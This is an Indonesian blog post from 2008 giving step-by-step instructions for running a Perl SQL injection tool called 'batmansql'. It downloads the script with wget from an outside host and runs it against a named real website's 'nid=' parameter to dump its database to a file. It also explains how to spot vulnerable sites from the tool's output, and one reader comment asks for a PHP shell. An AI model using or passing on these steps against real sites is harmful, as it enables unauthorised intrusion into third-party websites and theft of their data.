14 Sep 2008

Perl SQL Injection

Login ke shell kita

Download batmansql.txt di http://www.tongseng.com/batmansql.txt

ketik: wget http://www.tongseng.com/batmansql.txt

Ubah nama file menjadi batmansql.pl

ketik: mv batmansql.txt batmansql.pl

Jalankan dgn perintah:









(klik gambar untuk memperbesar)

perl batmansql.pl(spasi)target(spasi)jumlah kolom yg mau dicek(spasi)namafileoutput

Contoh target yg sudah terbukti bisa diinject: www.akaclan.com

Karena syarat web target hrs mengandung "id=", maka kita gunakan link:

http://www.akaclan.com/news-article.php?nid=

Mulai inject:

- Ketik perl perl batmansql.pl http://www.akaclan.com/news-article.php?nid= 50 batman01.txt -- -T -C




















(klik gambar untuk memperbesar)

Hasil injeksi akan disave ke file batman01.txt

Ciri-ciri website/forum yang bisa diinject:
Muncul tulisan:
[!] Checking if the website is vulnerable...
[+] Vulnerable website, script continues...

Jika muncul keterangan seperti itu, berarti website tsb bisa kita inject SQL-nya :)

2 komentar:

Han said...

Keren wid.wah gelar nya tambah wid. Pak dokter. Hehe

Chapzha said...

Bozz php shellny gimana bozz ????

Label's

Blog Archive

What's up doc?



Tebak Hari Lahir

When were you born?

Powered by Blogger.

Followers


 

Design by Blogger Buster | Distributed by Blogging Tips